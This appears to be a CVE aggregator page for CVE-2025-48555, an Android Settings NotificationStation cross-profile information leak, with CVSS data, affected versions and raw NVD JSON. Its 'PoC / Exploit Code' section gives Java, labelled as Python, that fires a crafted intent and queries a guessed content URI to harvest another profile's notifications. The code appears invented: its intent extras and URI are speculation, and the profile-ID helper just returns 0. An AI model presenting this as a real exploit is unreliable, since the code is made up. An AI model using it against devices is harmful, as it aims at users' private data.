Security Vulnerability Report
中文
CVE-2025-48555 CVSS 7.8 HIGH

CVE-2025-48555

Published: 2025-12-08 17:16:15
Last Modified: 2025-12-09 21:43:05
Source: [email protected]

Description

In multiple functions of NotificationStation.java, there is a possible cross-profile information disclosure due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE
Android Settings 应用 (NotificationStation.java) < 修复版本
受影响的Android版本需参考2025年12月安全公告
建议查看source.android.com/security/bulletin/2025-12-01获取详细受影响版本列表

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48555 PoC - Cross-Profile Information Disclosure // This PoC demonstrates the confused deputy issue in NotificationStation.java // Note: Actual exploitation requires specific Android environment setup import android.content.ComponentName; import android.content.Intent; import android.os.Bundle; import android.app.NotificationManager; public class CVE_2025_48555_PoC { // Target component in Android Settings private static final String TARGET_PACKAGE = "com.android.settings"; private static final String TARGET_CLASS = "com.android.settings.notification.NotificationStation"; public void exploitCrossProfileLeak() { // Step 1: Prepare intent targeting NotificationStation Intent intent = new Intent(); intent.setComponent(new ComponentName(TARGET_PACKAGE, TARGET_CLASS)); // Step 2: Exploit confused deputy by crafting cross-profile request // The vulnerable code fails to properly validate the calling profile Bundle extras = new Bundle(); extras.putString("request_type", "notification_list"); extras.putInt("target_profile_id", getWorkProfileId()); intent.putExtras(extras); // Step 3: Send intent without proper permission check // This should be blocked but vulnerable code allows it try { startActivity(intent); // If successful, notification data from other profile is exposed } catch (SecurityException e) { // Expected behavior - should be blocked } } private int getWorkProfileId() { // Obtain work profile ID through standard Android APIs return 0; } // Alternative: Direct content provider access if exposed public void exploitViaContentProvider() { android.net.Uri uri = android.net.Uri.parse( "content://com.android.settings.notification/notifications" ); // Query should be filtered by profile but vulnerable implementation leaks data android.database.Cursor cursor = getContentResolver().query( uri, null, null, null, null ); if (cursor != null) { while (cursor.moveToNext()) { // Extract leaked notification data from other profile String notificationData = cursor.getString(0); processLeakedData(notificationData); } cursor.close(); } } private void processLeakedData(String data) { // Process obtained sensitive notification information } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48555", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:14.543", "lastModified": "2025-12-09T21:43:05.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In multiple functions of NotificationStation.java, there is a possible cross-profile information disclosure due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-441"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/packages/apps/Settings/+/596c7b9911f2004df83b8d2708ad4b50e8d53805", "source": "[email protected]", "tags": ["Product", "Patch"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.